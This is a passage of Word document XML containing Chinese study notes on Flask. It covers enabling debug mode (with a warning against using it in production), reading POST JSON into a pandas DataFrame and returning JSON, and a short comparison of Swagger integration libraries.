    <w:p w14:paraId="14B13781" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这会让操作系统监听所有公网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB080F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55610A21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法适用于启动本地的开发服务器，但是你每次修改代码后都要手动重启它。这样并不够优雅，而且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以做到更好。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果你启用了调试支持，服务器会在代码修改后自动重新载入，并在发生错误时提供一个相当有用的调试器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（注意！这个调试器里用户可以执行任意代码，生产环境必须不可以使用“调试模式”）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE765F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两种途径来启用调试模式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399FE0F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>一种是直接在应用对象上设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458573DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.debug = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBAB7DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C2CD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>另一种是作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>方法的一个参数传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC11D9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.run(debug=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99938E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种方法的效果完全相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE9D1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DEB94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43634D47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C91BDE0" w14:textId="77777777" w:rsidR="005E70C0" w:rsidRDefault="005E70C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F67677B" w14:textId="11E08165" w:rsidR="005E70C0" w:rsidRDefault="005E70C0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取请求中的参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539885B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D4336C" w14:textId="7D9DFF59" w:rsidR="005E70C0" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求的数据，并读为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B81811" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2142FBF1" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from flask import request, jsonify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8123C" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13705ECB" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>@app.route('/', methods = ["POST"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F140CD" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def post_data():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4FD503" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设有如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB9415" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #{"obj": [{"name":"John","age":"20"}] }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085CA1C1" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B61E76" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB7B4B" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data = request.get_json()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875D1B2" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data = pd.DataFrame(data["obj"])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取参数并转变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DataFrame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA979F" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A976F33" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91D976" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data = request.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JOSN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5046DB" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data = data.get('obj')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     #  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以字典形式获取参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB01DF" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07439857" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过处理之后得到要传回的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737EA4B" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res = some_function(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47240AEC" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC3EB1B" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DataFrame  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据再次打包为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并传回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F4FD1" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3345B2B5" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res = '{{"obj": {} }}'.format(res.to_json(orient = "records", force_ascii = False))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5A2EC" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7F10D" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # res = jsonify({"obj":res.to_json(orient = "records", force_ascii = False)})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D77E34" w14:textId="77777777" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F565A" w14:textId="7A115BBE" w:rsidR="00D534A7" w:rsidRDefault="00D534A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76698F" w14:textId="77777777" w:rsidR="005E70C0" w:rsidRDefault="005E70C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133BA0D3" w14:textId="77777777" w:rsidR="005E70C0" w:rsidRDefault="005E70C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE25A3B" w14:textId="4DDEC772" w:rsidR="00062565" w:rsidRDefault="006B2A69" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD11878" w14:textId="77777777" w:rsidR="00062565" w:rsidRDefault="00062565" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69775F2C" w14:textId="77777777" w:rsidR="00062565" w:rsidRDefault="00062565" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4DBC88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A467018" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B471586" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41117020" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5507492D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138F1D1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="576" w:name="_Toc159780009"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>swagger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="576"/>
    </w:p>
    <w:p w14:paraId="745CAC3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22487DAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://yanbin.blog/flask-integrate-with-swagger-ui/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209FD56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flasgger : </w:t>
      </w:r>
      <w:r>
        <w:t>好像是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flask-swagger </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64489B84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">flask-swagger: </w:t>
      </w:r>
      <w:r>
        <w:t>许久未更新了，不用考虑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082F789" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">flask-restful-swagger: </w:t>
      </w:r>
      <w:r>
        <w:t>到目前也两年未更新了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F21C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flask-RESTPlus </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Swagger </w:t>
      </w:r>
      <w:r>
        <w:t>特性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>真需要用到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flask-RESTPlus </w:t>
      </w:r>
      <w:r>
        <w:t>就可以用它</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9FB56C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58FFB9D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658848A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
        </w:rPr>
